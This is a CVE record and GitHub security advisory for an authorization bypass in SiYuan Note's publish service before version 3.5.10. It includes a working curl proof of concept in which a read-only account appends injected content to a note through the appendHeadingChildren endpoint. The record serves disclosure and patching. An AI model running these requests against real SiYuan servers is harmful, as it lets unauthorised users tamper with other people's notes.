SiYuan is a personal knowledge management system. Prior to 3.5.10, a privilege escalation vulnerability exists in the publish service of SiYuan Note that allows low-privilege publish accounts (RoleReader) to modify notebook content via the /api/block/appendHeadingChildren API endpoint. The endpoint requires only the model.CheckAuth role, which accepts RoleReader sessions, but it does not enforce stricter checks, such as CheckAdminRole or CheckReadonly. This allows remote authenticated publish users with read-only privileges to append new blocks to existing documents, compromising the integrity of stored notes.
PUBLISHED5.2CWE-284CWE-862
SiYuan Note publish service authorization bypass allows low-privilege users to modify notebook content
Problem type
Affected products
siyuan-note
siyuan
< 3.5.10 - AFFECTED
References
GitHub Security Advisories
GHSA-f9cq-v43p-v523
SiYuan: Authorization Bypass Allows Low-Privilege Publish User to Modify Notebook Content via /api/block/appendHeadingChildren
https://github.com/advisories/GHSA-f9cq-v43p-v523Summary
A privilege escalation vulnerability exists in the publish service of SiYuan Note that allows a low-privilege publish account (RoleReader) to modify notebook content via the /api/block/appendHeadingChildren API endpoint.
The endpoint only requires model.CheckAuth, which accepts RoleReader sessions. Because the endpoint performs a persistent document mutation and does not enforce CheckAdminRole or CheckReadonly, a publish user with read-only privileges can append new blocks to existing documents.
This allows remote authenticated publish users to modify notebook content and compromise the integrity of stored notes.
Details
File: router.go, block.go, block.go, session.go Lines: router.go:245, api/block.go:193-205, model/block.go:688-714, model/session.go:201-209 Vulnerable Code:
- router.go: ginServer.Handle("POST", "/api/block/appendHeadingChildren", model.CheckAuth, appendHeadingChildren)
- api/block.go: model.AppendHeadingChildren(id, childrenDOM)
- model/block.go: indexWriteTreeUpsertQueue(tree) (persists document mutation)
- session.go: CheckAuth accepts RoleReader as authenticated
Why Vulnerable: A low-privilege publish account (RoleReader, read-only) passes CheckAuth, but this write endpoint lacks CheckAdminRole and CheckReadonly. The handler performs persistent document writes.
PoC
- Enable publish service and create low-privilege account
curl -u workspace:<ACCESS_AUTH_CODE> \
-H "Content-Type: application/json" \
-d '{
"enable": true,
"port": 6808,
"auth": {
"enable": true,
"accounts": [
{
"username": "viewer",
"password": "viewerpass"
}
]
}
}' \
http://127.0.0.1:6806/api/setting/setPublish
- Create a test notebook and document (admin)
curl -u workspace:<ACCESS_AUTH_CODE> \
-H "Content-Type: application/json" \
-d '{"name":"AuditPOC"}' \
http://127.0.0.1:6806/api/notebook/createNotebook
Create a document containing a heading:
curl -u workspace:<ACCESS_AUTH_CODE> \
-H "Content-Type: application/json" \
-d '{
"notebook":"<NOTEBOOK_ID>",
"path":"/Victim",
"markdown":"# VictimHeading\n\nOriginal paragraph"
}' \
http://127.0.0.1:6806/api/filetree/createDocWithMd
- Retrieve heading block ID (low-priv publish account)
curl -u viewer:viewerpass \
-H "Content-Type: application/json" \
-d '{"stmt":"SELECT id,root_id FROM blocks WHERE content='\''VictimHeading'\'' LIMIT 1"}' \
http://127.0.0.1:6808/api/query/sql
Example response:
{
"id":"20260307093334-05sj7bz",
"root_id":"20260307093334-vsa6ft0"
}
- Generate block DOM
curl -u viewer:viewerpass \
-H "Content-Type: application/json" \
-d '{"dom":"<p>InjectedByReader</p>"}' \
http://127.0.0.1:6808/api/lute/html2BlockDOM
- Append block using the vulnerable endpoint
curl -u viewer:viewerpass \
-H "Content-Type: application/json" \
-d '{
"id":"20260307093334-05sj7bz",
"childrenDOM":"<div ...>InjectedByReader</div>"
}' \
http://127.0.0.1:6808/api/block/appendHeadingChildren
Server response:
{"code":0}
- Verify unauthorized modification
curl -u viewer:viewerpass \
-H "Content-Type: application/json" \
-d '{"stmt":"SELECT content FROM blocks WHERE root_id='\''20260307093334-vsa6ft0'\'' ORDER BY sort"}' \
http://127.0.0.1:6808/api/query/sql
Result includes attacker-controlled content:
InjectedByReader
This confirms that the low-privilege publish user successfully modified the document.
Impact
This vulnerability allows any authenticated publish user with read-only privileges (RoleReader) to modify notebook content.
Potential impacts include:
• Unauthorized modification of private notes • Content tampering in published notebooks • Loss of data integrity • Possible chaining with other API endpoints to escalate further privileges
The issue occurs because write operations are protected only by CheckAuth rather than enforcing role-based authorization checks.
JSON source
https://cveawg.mitre.org/api/cve/CVE-2026-30926Click to expand
{
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"cveMetadata": {
"cveId": "CVE-2026-30926",
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"dateUpdated": "2026-03-09T21:07:07.481Z",
"dateReserved": "2026-03-07T16:40:05.884Z",
"datePublished": "2026-03-09T21:07:07.481Z",
"state": "PUBLISHED"
},
"containers": {
"cna": {
"providerMetadata": {
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M",
"dateUpdated": "2026-03-09T21:07:07.481Z"
},
"title": "SiYuan Note publish service authorization bypass allows low-privilege users to modify notebook content",
"descriptions": [
{
"lang": "en",
"value": "SiYuan is a personal knowledge management system. Prior to 3.5.10, a privilege escalation vulnerability exists in the publish service of SiYuan Note that allows low-privilege publish accounts (RoleReader) to modify notebook content via the /api/block/appendHeadingChildren API endpoint. The endpoint requires only the model.CheckAuth role, which accepts RoleReader sessions, but it does not enforce stricter checks, such as CheckAdminRole or CheckReadonly. This allows remote authenticated publish users with read-only privileges to append new blocks to existing documents, compromising the integrity of stored notes."
}
],
"affected": [
{
"vendor": "siyuan-note",
"product": "siyuan",
"versions": [
{
"version": "< 3.5.10",
"status": "affected"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"lang": "en",
"description": "CWE-284: Improper Access Control",
"cweId": "CWE-284",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"lang": "en",
"description": "CWE-862: Missing Authorization",
"cweId": "CWE-862",
"type": "CWE"
}
]
}
],
"references": [
{
"url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-f9cq-v43p-v523",
"name": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-f9cq-v43p-v523",
"tags": [
"x_refsource_CONFIRM"
]
}
],
"metrics": [
{
"cvssV3_1": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH"
}
}
]
}
}
}